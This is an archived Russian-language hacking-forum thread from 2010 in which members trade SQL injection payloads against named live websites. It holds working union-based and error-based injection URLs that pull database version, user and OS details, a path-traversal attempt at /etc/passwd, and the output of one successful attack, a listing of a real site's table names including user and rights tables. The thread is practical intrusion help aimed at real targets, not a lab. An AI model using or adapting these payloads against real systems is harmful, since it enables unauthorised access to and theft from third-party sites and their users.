03.04.2010, 15:00
|
|
Banned
Регистрация: 04.06.2009
Сообщений: 58
С нами:
8913322
Репутация:
23
|
|
Парни подскажите хорошую статью о проведении sqli в Oracle .
|
|
|
03.04.2010, 16:52
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от G1G
Парни подскажите хорошую статью о проведении sqli в Oracle .
https://forum.antichat.ru/thread40576.html
https://forum.antichat.ru/thread162060.html
https://forum.antichat.ru/thread161670.html
|
|
|
|
03.04.2010, 16:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Ну там же явно написано, крутил как слепую, по правилам (классическим) blind sql injection, для получения системной информации не требуется ни union, ни select
|
|
|
|
03.04.2010, 17:04
|
|
Banned
Регистрация: 04.06.2009
Сообщений: 58
С нами:
8913322
Репутация:
23
|
|
deleted
Последний раз редактировалось G1G; 03.04.2010 в 21:30..
|
|
|
|
03.04.2010, 19:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2daniel_1024
http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os))),4,5, 6--
|
|
|
|
03.04.2010, 19:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
http://www.ruraldoc.com.au/content_sub.php?id=(select(1)from(select+count(0), concat((select(version())),floor(rand(0)*2))from(s econd_level)+group+by+2)a)
))
|
|
|
|
03.04.2010, 20:18
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '../.../.../.../.../.../.../../../.../etc/passwd' at line 1 SELECT `id`, `title` FROM `statpage` WHERE `sid`
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль? |
|
|
|
03.04.2010, 20:25
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Ershik
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль?
инклуд нету потому что love это значение колонки "сид" в бд, а не файл
Последний раз редактировалось Konqi; 03.04.2010 в 21:49..
|
|
|
|
04.04.2010, 14:39
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Ershik
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль?
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),4+--+
5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:de bian-linux-gnu
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_conc at(0x0b,table_name),4+from+information_schema.tabl es+--+
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
article,
const,
group,
group_refer,
menu,
news,
rights,
rights_refer,
statpage,
user
|
|
|
|
03.04.2010, 20:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+count(0),concat((select(version())),floor(rand(0)*2))from(statpage)+group+by+2)a)--+
)) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
